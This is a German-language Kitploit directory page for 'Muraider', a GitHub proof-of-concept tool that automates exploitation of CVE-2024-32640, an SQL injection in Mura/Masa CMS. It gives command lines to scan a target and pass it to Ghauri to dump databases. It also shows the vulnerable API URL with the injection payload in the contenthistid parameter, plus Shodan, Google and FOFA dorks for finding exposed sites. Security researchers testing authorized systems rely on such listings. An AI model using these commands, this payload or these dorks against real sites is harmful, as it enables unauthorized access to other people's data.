Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-32640-SQLI-MuraCMS — CVE-2024-32640 | Automatisierte SQLi-Exploitation PoC | Kitploit
Tools/GitHubGitHub/stuub/cve-2024-32640-sqli-muracms
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubstuub/cve-2024-32640-sqli-muracms

CVE-2024-32640-SQLI-MuraCMS

CVE-2024-32640 | Automatisierte SQLi-Exploitation PoC

Repository anzeigen
78121vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Muraider - Automatisierung der Erkennung und Ausnutzung von CVE-2024-32640 \ SQLi in Mura/Masa CMS

Verwendung

Erkennung:

python3 CVE-2024-32640.py --url https://target.com/

Ghauri-Ausnutzung (Übergib '-g' oder '--ghauri' als Argument):

Übergib alle Argumente, die du mit Ghauri verwenden möchtest, gemäß deren Argumentliste:

python3 CVE-2024-32640.py --url https://target.com -g "--dbs --current-db"

python3 CVE-2024-32640.py --url https://target.com --ghauri "--dbs --current-db"

Beispiel

image

Ghauri SQLI Automatisierung:

Unter Verwendung der Erkennung, die ich in das Tool implementiert habe, können wir dann das verwundbare Ziel mit Ghauri ausnutzen. Das Skript automatisiert diesen Prozess, indem es alle benötigten Zielinformationen analysiert und in einen Aufruf an Ghauri übergibt.

image

Details

Durch Anhängen einer Escape-Sequenz (%5c) an den Wert des HTML-Query-Parameters contenthisid können wir überprüfen, ob ein Ziel für diese SQLi anfällig ist.

Eine erfolgreiche Ausnutzung könnte zu unbefugtem Zugriff auf sensible Daten führen.

URL: https://target.com/_api/json/v1/default/?method=processAsyncObject&object=displayregion&contenthistid=x%5c'&previewID=x

Dorks

Shodan-Abfrage: 'Generator: Masa CMS'

Google: "powered by Mura CMS"

FOFA: app="Mura-CMS"

Referenzen:

https://twitter.com/HunterMapping/status/1790620695371911388

https://www.seebug.org/vuldb/ssvid-99835

Tool herunterladen